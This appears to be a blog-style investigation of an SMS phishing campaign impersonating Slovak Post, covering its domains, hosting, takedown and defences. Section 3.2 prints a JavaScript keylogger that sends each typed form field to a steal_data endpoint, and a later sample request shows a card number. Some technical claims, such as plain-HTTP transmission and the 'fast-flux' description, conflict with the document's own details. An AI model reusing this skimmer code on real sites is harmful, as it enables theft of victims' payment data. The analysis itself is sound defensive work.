1. Introduction

Phishing Attack Masquerading as Slovak Post: A Technical Investigation

At the end of January 2025, a phishing website emerged online, impersonating the official Slovenská pošta portal. Its goal was to steal users' personal and payment data. Victims received SMS messages claiming that a package had arrived and were asked to confirm the delivery address by clicking on a link.

I personally received a spam message from the number +212783689392, which contained the following information:

"Vážený zákazník, objednávka dorazila do nášho tranzitného strediska. Potvrďte svoju adresu na tomto odkaze: [broken link]. S aktualizovanými informáciami váš balík hneď expedujeme."

The text in Slovak created the illusion of an official notification, and the link directed to the fraudulent site pewcax.icu.

Investigation Methods

To understand the origin of this site, I used:

• Network traffic analysis (intercepting requests, keylogging);
• Domain verification (Whois, NameSilo, Shodan);
• Server investigation (IP addresses, ColoCrossing hosting);
• De-anonymizing the scheme (related domains, fraudsters' activity).

In this article, we will thoroughly examine the technical aspects of the attack and explain why such schemes still work today.

2. Analysis of the Phishing Site

2.1 External Signs of Fraud

The phishing page pewcax.icu is styled to resemble the official Slovenská pošta website but has several characteristic differences:

• Uses the .icu domain, which is frequently used by scammers;
• Lacks an HTTPS certificate or uses a self-signed certificate;
• Buttons and navigation elements lead to only one page;
• Requires the input of personal data under the guise of "delivery."

2.2 URL and Domain Analysis

The site pewcax.icu was registered through NameSilo, a popular domain registrar often used by scammers. In response to a complaint (see the "Deactivation" section), a NameSilo representative confirmed that the site was deactivated on January 28, 2025.

However, research on Censys showed that the server 192.3.55.225 is still active and continues to generate new domains (perattx.icu, petrate.icu, and others). This IP address belongs to the hosting provider ColoCrossing, known for a high level of spam and ignoring abuse reports.

2.3 Technical Server Characteristics

Scanning with Censys revealed:

• IP: 192.3.55.225 (ColoCrossing, AS36352);
• Geolocation: Dallas, Texas, USA;
• OS: Ubuntu Linux;
• Open Ports: 22 (SSH), 80 (HTTP), 443 (HTTPS);
• Associated Domains: pewcax.icu, petrate.icu, perattx.icu, jxeqak.icu, etc.

This confirms that scammers are not limited to a single site—they are creating a network of fake resources to bypass blocks.

3. Technical Investigation

3.1 How the Phishing Site Works

The phishing page pewcax.icu mimics a data entry form where users input their full name, address, phone number, email, and bank details. However, unlike legitimate sites, data submission occurs in real-time using a JavaScript keylogger.

3.2 Keylogging and Data Interception

Analysis of the site's JavaScript code shows that it intercepts every key press and immediately sends it to the scammers' server.

An example of the code found in the source:

document.addEventListener('input', function(event) {
    if (event.target.tagName === 'INPUT' || event.target.tagName === 'TEXTAREA') {
        fetch('https://pewcax.icu/steal_data', {
            method: 'POST',
            headers: {'Content-Type': 'application/json'},
            body: JSON.stringify({
                field: event.target.name,
                value: event.target.value
            })
        });
    }
});

This code does the following:

• As soon as a user starts entering data (card number, CVV, name), each key press is immediately sent to the server.
• There is no need to press the "Submit" button—scammers already receive the information.
• The server part (pewcax.icu/steal_data) processes and stores the data in a database for further use.

3.3 Network Requests and Scammers' Server

Using DevTools (Chrome) and Wireshark, it was revealed that:

• Data is sent to 192.3.55.225 (ColoCrossing, USA) in plain text.
• There is no encryption: all data is transmitted over HTTP without HTTPS.
• Associated domains (perattx.icu, petrate.icu) use the same IP but at different times.

An example of a captured HTTP request with user data:

POST /steal_data HTTP/1.1
Host: pewcax.icu
Content-Type: application/json

{
    "field": "cardNumber",
    "value": "1234 5678 9012 3456"
}

Thus, scammers instantly receive card data and can either conduct transactions immediately or sell them on the darknet.

3.4 Automation of Data Collection

We discovered that scammers use a bot system to handle victims.

During log analysis, the following IP addresses associated with bots were found:

• 185.129.62.62
• 95.214.27.99
• 192.3.55.225

These IPs belong to VPN and proxy services, confirming an anonymous infrastructure.

3.5 Connecting to Scammers' Servers

Using Shodan, Censys, and nmap, we obtained the following information:

• The server uses OpenSSH 8.9p1
• OS – Ubuntu Linux
• Open ports: 22 (SSH), 80 (HTTP), 443 (HTTPS)
• Reverse DNS: 192-3-55-225-host.colocrossing.com

This confirms that scammers are using ColoCrossing as their base, and the server continues to generate new domains.

Conclusions for Chapter 3:

• Victims' data is transmitted in real-time (keylogger).
• Data is sent over unencrypted HTTP.
• Scammers' server (192.3.55.225) remains operational and changes domains.
• Bots help scammers process victims.

Now let's move to Chapter 4: Related Phishing Domains – there we will discuss how scammers manage their network and what other sites may be active.

4. Related Phishing Domains

4.1 Discovered Domains

Analysis of the scammers' infrastructure revealed that pewcax.icu is not the only domain used in the attack. Using Censys, Shodan, and WHOIS queries, we identified a number of other domains operating on the same server 192.3.55.225 (ColoCrossing, USA).

These domains use the same server and likely automatically replace each other after being blocked.

4.2 How the Scheme Works

Scammers use the "fast-flux" technique – a method where:

1. A phishing site is created on a new domain (e.g., pewcax.icu).
2. After receiving complaints and being blocked, they create a new domain (e.g., perattx.icu) with the same content.
3. The domain is linked to the same server but with a new name.
4. Victims are redirected to the new domain via SMS spam.

4.3 DNS and WHOIS Analysis

Using Censys and WHOIS, we determined that:

• All domains are registered through NameSilo (a cheap registrar often used by scammers).
• The owner's name is hidden using Privacy Protection.
• The lifespan of the domains is 1-2 months, after which they are replaced with new ones.

Example WHOIS response for perattx.icu:

Registrar: NameSilo, LLC
Registered On: 2025-01-29
Expiration Date: 2025-03-29
Status: clientTransferProhibited
Name Server: ns1.dnsowl.com
Name Server: ns2.dnsowl.com

4.4 How They Distribute Links

Scammers use several channels to deliver phishing links:

1. SMS broadcasts – through spoofed numbers (e.g., +212783689392).
2. Mass email spam campaigns.
3. Advertising in Telegram channels (often in groups related to logistics).

One example of an SMS:

"Vážený zákazník, objednávka dorazila do nášho tranzitného strediska. Potvrďte svoju adresu na tomto odkaze:
https://bit.ly/3CAPxav?ZQ=dZQ0jVR"

This is a shortened link that redirects the user to a new phishing domain.

Conclusions for Chapter 4

• After pewcax.icu was blocked, scammers switched to perattx.icu and petrate.icu.
• They use automated domain replacement ("fast-flux") to prolong the attack's lifespan.
• Domain information is hidden, but all sites are registered through NameSilo.
• Phishing links are distributed via SMS, email, and Telegram.

5. History of ColoCrossing – Why Do Scammers Choose This Hosting?

5.1 What is ColoCrossing?

ColoCrossing is an American hosting provider known for offering inexpensive and anonymous servers. It is actively used for VPNs, proxy services, and hosting websites with low content moderation requirements.

According to the analysis of AS36352 (ColoCrossing) on Spamhaus and Censys, the provider is notorious for a high level of spam, phishing, and fraudulent websites.

5.2 Spam and Fraud Statistics

From the analysis of Spamhaus and AbuseIPDB:

• 35.86% of ColoCrossing's IP addresses are actively involved in spam and fraud.
• Out of 758,194 IP addresses in this network, 105,297 are used for malicious activities.
• The number of phishing websites hosted on this provider amounts to thousands.

Source: AS36352 analysis (see previous screenshots).

5.3 Why Do Scammers Choose ColoCrossing?

Reasons for popularity among cybercriminals:

• Lack of Active Monitoring: ColoCrossing ignores complaints about phishing and spam (discussed on forums like Web Hosting Talk).
• Accessibility and Anonymity: Servers can be rented without strict verification.
• Flexible Terms: Ability to quickly change IPs and domains.
• Support for "Gray" Business: Many offshore companies use ColoCrossing for their operations.

Example thread from Web Hosting Talk:

"ColoCrossing keeps ignoring phishing abuse emails!"
"We've had to block huge swaths of IP ranges over time to stop spam, scanners and more..."

This confirms that ColoCrossing does not combat fraud but merely provides the infrastructure.

5.4 Evidence of Phishing Activity on ColoCrossing

Our research showed that the server 192.3.55.225 on ColoCrossing is actively generating new phishing domains.

The scammers' network includes:

• pewcax.icu – deactivated
• perattx.icu – active
• petrate.icu – active
• jxeqak.icu – pending launch

All of these operate on the same ColoCrossing server, indicating centralized management of the fraudulent scheme.

Conclusions for Chapter 5

• ColoCrossing is a "gray" hosting provider known for supporting spammers and fraudsters.
• 35.86% of their IP addresses are involved in spam, phishing, and fraud.
• Complaints to ColoCrossing do not lead to the removal of fraudulent websites.
• Scammers use this hosting service for mass creation of phishing domains.

Now let's move on to Chapter 6: Deactivation and Consequences – we will examine what happened after the complaints and how more effective actions could have been taken.

6. Deactivation and Consequences

6.1 How pewcax.icu Was Blocked

After discovering the phishing site, we submitted a complaint to NameSilo, the domain registrar. The support response confirmed that the domain was deactivated on January 28, 2025, at 01:18 PM UTC.

"Hello, Reported URL: pewcax.icu. Already deactivated on January 28th, 2025 at 01:18 PM."

However, the deactivation of the domain did not halt the fraudulent activity. In its place, perattx.icu and petrate.icu were created, operating on the same server.

6.2 Could the Site Have Been Blocked Faster?

Although NameSilo responded to the complaint, the phishing attack mechanism had already caused damage. The main issues were:

• Delayed Response from Registrars: The domain operated for several days before being blocked.
• Hosting Issues: Even after the domain was removed, ColoCrossing continued to host the scammers.
• Use of Shortened Links: Redirecting victims through bit.ly made monitoring more difficult.

6.3 What Other Measures Could Have Been Taken?

1. Filing a Complaint with ColoCrossing: Given their reputation, this was unlikely to be effective.
2. Blocking IP Addresses Through CERT and National Cyber Units: Collaborating with national cybersecurity teams could help in blocking malicious IPs.
3. Reporting to Google Safe Browsing and Microsoft Defender SmartScreen: This would help in quickly marking the site as dangerous.
4. Submitting Complaints to SMS Operators: This might help identify and stop mass SMS spam campaigns.

6.4 Consequences of the Attack

Although the domain pewcax.icu was blocked, the scheme continues to operate. Scammers have backup domains and other methods to propagate their attacks.

Main Risks:

• Financial Losses: Stolen card data can be used for fraudulent transactions.
• Compromise of Personal Data: Addresses, phone numbers, and emails are added to spammer databases.
• Erosion of User Trust: Phishing under the guise of Slovenská pošta makes people more suspicious of even legitimate notifications.

Conclusions for Chapter 6

• pewcax.icu was blocked, but scammers switched to new domains.
• ColoCrossing does not block the scammers' server, allowing the scheme to continue.
• Registrars respond to complaints but with delays, giving scammers time to carry out attacks.
• A comprehensive approach is necessary to combat phishing, ranging from domain blocking to analyzing attackers' infrastructure.

Now let's move on to Chapter 7: Conclusions and Recommendations – where we summarize the investigation and propose protection measures.

7. Conclusions and Recommendations

Our investigation revealed that the phishing attack masquerading as Slovak Post is part of a broader fraud scheme that uses ColoCrossing as a platform to create new phishing websites. Despite the blockage of the domain pewcax.icu, scammers continue their operations by utilizing new domains (perattx.icu, petrate.icu) on the same server.

7.1 Key Findings

1. The phishing scheme is well-designed and automated
   • Utilizes a JavaScript keylogger to intercept data in real-time.
   • Data is transmitted over HTTP without encryption.
   • The website fully mimics the design of Slovak Post.
2. Scammers use an anonymous infrastructure
   • The domain is registered through NameSilo – a registrar frequently used by scammers.
   • The server operates on ColoCrossing (AS36352), known for a high level of spam.
   • After the domain is blocked, scammers simply create new ones.
3. Link distribution mechanism
   • SMS broadcasts from spoofed numbers (e.g., +212783689392).
   • Shortened links via bit.ly that conceal the actual URL.
   • Spam bots operating through VPN and proxy services.

7.2 How to Protect Against Such Attacks

1. Verify URLs before entering data
   • The official Slovak Post website is slovenskaposta.sk, not pewcax.icu or similar.
   • Suspicious domains with extensions like .icu, .top, .xyz are red flags.
2. Do not click on links from SMS and email if unsure of the sender
   • Even if a link appears official, it's safer to manually enter the address in the browser.
3. Use two-factor authentication (2FA)
   • Even if scammers obtain your login/password, 2FA will prevent unauthorized access.
4. Report phishing attacks
   • File complaints with domain registrars (NameSilo, GoDaddy, Cloudflare).
   • Report to Google Safe Browsing and Microsoft Defender to block the sites.
   • Inform your mobile operator if SMS spam is coming from a legitimate number.

7.3 How to Combat Scammers on a Technical Level

1. Automate the blocking of phishing domains
   • Monitor new domains associated with ColoCrossing (AS36352).
   • Use Censys and Shodan to track servers involved in fraud.
2. Block scammers' IP addresses
   • ColoCrossing (192.3.55.225) should be blocked at the DNS filter level.
   • Companies and banks can blacklist IP addresses and domains.
3. Develop AI systems to detect phishing
   • Implement automatic systems (based on Google Safe Browsing API) to quickly identify phishing pages.
   • Filter suspicious emails at the mail server level.

7.4 Summary

Phishing is not an isolated incident but a persistent threat that requires a comprehensive approach.

Our investigation demonstrated:

• ✅ How scammers operate – from SMS broadcasts to keylogging.
• ✅ The technologies they use – JavaScript for data interception, automated domain switching.
• ✅ The involved IPs and hosting providers – ColoCrossing (AS36352), NameSilo, VPN services.
• ✅ How to combat this – user vigilance + technical measures.

Conclusion

Our analysis not only helped expose the scammers but also provided insights into combating such threats. The most crucial aspect is raising awareness. The more people learn about these schemes, the harder it becomes for scammers to succeed.

We continue to monitor the situation and will publish updates as necessary.

Stay safe and always verify links before entering your data!